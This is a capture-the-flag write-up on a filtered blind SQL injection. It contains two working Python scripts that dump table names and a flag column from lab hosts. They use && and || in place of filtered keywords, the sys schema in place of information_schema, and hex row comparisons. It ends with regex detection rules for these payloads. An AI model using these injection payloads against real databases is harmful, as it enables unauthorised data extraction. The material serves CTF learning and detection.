Fuzz
Fuzzing showed that and, or, if and information_schema are filtered; union and select are filtered when they appear together but not separately; join and regexp are filtered as well.
So consider blind injection. Since information_schema is filtered, it can be replaced with sys.x$schema_flattened_keys.
While fuzzing, I found that a successful query echoes Nu1L in the response.
Dumping the table names
exp:
    # -*- coding: UTF-8 -*-
    import requests

    flag = ''
    url = 'http://9ed82b30-6500-472d-af3b-2c380fc65adc.node3.buuoj.cn/index.php'
    for i in range(1, 50):
        for j in range(32, 128):
            # Boolean oracle: the page echoes Nu1L only when the condition holds.
            # sys.x$schema_flattened_keys stands in for the filtered information_schema,
            # and && replaces the filtered "and".
            payload = ("1 && ascii(substr((select group_concat(table_name)"
                       "from sys.x$schema_flattened_keys where table_schema=database()),"
                       + str(i) + ",1))=" + str(j) + "#")
            data = {'id': payload}
            res = requests.post(url, data=data)
            if 'Nu1L' in res.text:
                flag = flag + chr(j)
                print(flag)
                break
        else:
            # No character matched at this position: the table list is exhausted.
            break
When dumping the column, for some reason the data does not come out completely......
    # -*- coding:utf8 -*-
    import requests

    url = 'http://cc6b46e3-9379-4533-8dd8-3abf48842831.node3.buuoj.cn/index.php'

    def trans(flag):
        # Encode the candidate string as a single MySQL hex literal (0x...) so no quotes are needed.
        res = ''
        for i in flag:
            res += hex(ord(i))
        res = '0x' + res.replace('0x', '')
        return res

    flag = ''
    done = False
    for i in range(1, 700):
        # 127 so that a final '}' (126 - 1) can still be found.
        for char in range(32, 127):
            hexchar = trans(flag + chr(char))
            # Row-value comparison: becomes true once the guessed prefix sorts after the
            # real row, so the correct character is the previous one. || replaces the
            # filtered "or".
            payload = '2||((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
            data = {'id': payload}
            r = requests.post(url=url, data=data)
            if 'Nu1L' in r.text:
                if char == 32:
                    # Even the smallest candidate sorts after the row: the value is complete.
                    done = True
                else:
                    flag += chr(char - 1)
                    print(flag)
                break
        if done:
            break
Dumping the table name tests the filtering of union select and information_schema.
Dumping the column is case-sensitive data injection (the comparison against the hex literal distinguishes upper and lower case).
Blind SQL injection without in: https://nosec.org/home/detail/3830.html
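As an added example from the defender's side (not code from the writeup), a small request-log scanner that flags the two bypass styles used above: symbolic && / || operators followed by a subquery, metadata reads from the sys schema instead of information_schema, the ascii(substr( oracle, and the row-value comparison against a hex literal. The log format and the lines themselves are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Each rule targets one trait of the payloads in the writeup rather than bare
# keywords, so ordinary parameters containing "and"/"or" do not trip it.
RULES = {
    "symbolic_logic_operator": re.compile(r"(?:&&|\|\|)\s*\(*\s*(?:ascii|select)\b", re.I),
    "sys_schema_metadata": re.compile(r"\bsys\s*\.\s*x\$\w+", re.I),
    "char_by_char_oracle": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "row_value_comparison": re.compile(r"\(\s*select\s+\d+\s*,\s*0x[0-9a-f]+\s*\)\s*[<>]", re.I),
}


def scan_body(body):
    """Return the names of all rules matched by one URL-decoded request body."""
    decoded = unquote_plus(body)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_log(lines):
    """Return (line_number, matched_rules) for every log line that trips a rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        matched = scan_body(line)
        if matched:
            hits.append((number, matched))
    return hits


# Constructed access-log lines: a benign request, the table-name payload, the
# column payload, and a benign body that merely contains "&&".
SAMPLE_LOG = [
    "10.0.0.5 POST /index.php id=42",
    "10.0.0.5 POST /index.php id=1+%26%26+ascii(substr((select+group_concat(table_name)"
    "from+sys.x%24schema_flattened_keys+where+table_schema%3Ddatabase()),1,1))%3D102%23",
    "10.0.0.5 POST /index.php id=2||((select+1,0x666c)>(select+*+from+f1ag_1s_h3r3_hhhhh))",
    "10.0.0.7 POST /search.php q=rock+%26%26+roll",
]

if __name__ == "__main__":
    for number, matched in scan_log(SAMPLE_LOG):
        print(number, ", ".join(matched))
```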